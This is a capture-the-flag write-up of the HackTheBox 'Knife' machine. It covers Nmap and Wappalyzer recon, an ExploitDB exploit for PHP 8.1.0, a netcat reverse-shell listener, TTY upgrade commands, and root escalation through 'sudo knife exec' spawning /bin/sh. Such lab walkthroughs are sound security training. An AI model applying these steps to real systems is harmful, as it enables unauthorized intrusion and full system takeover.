HackTheBox — Knife
knife is a new HTB machine based on Linux OS and it carries 20 points. It is a fairly easy machine that I was willing to give a shot. There are a few pre-requisites needed before we start this challenge. Some of them are Linux VM,wappalyzer, which is a chrome extension or we can use Recon-ng but in this write-up I used wappalyzer. So let's get started:
Reconnaissance:
I began with a simple Nmap scan.
There was nothing valuable I could infer from this scan except the fact that it had a web server running on port 80.
The site was pretty standard. I tried the usual inspection using inspect element and I literally came up with nothing up until I noticed this.
The wappalyzer found out that the webserver was written using a PHP programming language of version 8.1.0. Now all I had to do was search was exploit on exploitDB for possible vulnerability in such a version of PHP.
Bingo! I found a perfect exploit. Now all I had to do was download it or save it in a file and run the script.
And just like that, we got into their system. Now many things won't work for us since we don't have certain permissions on their system. So I tried to open their system to my side. In simple words, I bought their system into mine. In order to do this, we need to pop open a reverse shell onto their system and connect to ours using a tool called netcat. Now to get a reverse shell I used a script from pentest monkey for netcat
The second command seemed to work fine. So first I started listening to port 4444 using netcat command
|nc -nvlp 4444
and then I pasted the command from the pentest monkey into the system.
And just like that, I got a reverse shell into their system. Now I will apply tty shells to make our lives easier, which is moving around the terminal and using specific commands like ‘cd’ and so on. These are the commands to get a tty shell:
|python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
|export TERM=xterm
Once that's done we would get a terminal looking like this:
The first user flag was located at the directory /home/james.
Now with this command, we can understand that the command knife is a root operation but it does not need any password. This is clearly our vulnerability and we are about to abuse it to escalate our privileges. But first what is Knife?! so let's run that command and see what we get:
We are simply going to use this rooted operation to execute a /bin/sh into the system. The /bin/sh command was even there at the config files at the /homes/James directory, we are simply using that command to escalate our privalages. This the command to do so:
|sudo knife exec — exec “exec ‘/bin/sh -i’ “
BINGO! The flag is located in the root folder. Thank you for reading my write-up! :) please like if you felt like my write-up was useful to you in anyways, thank you once again!.
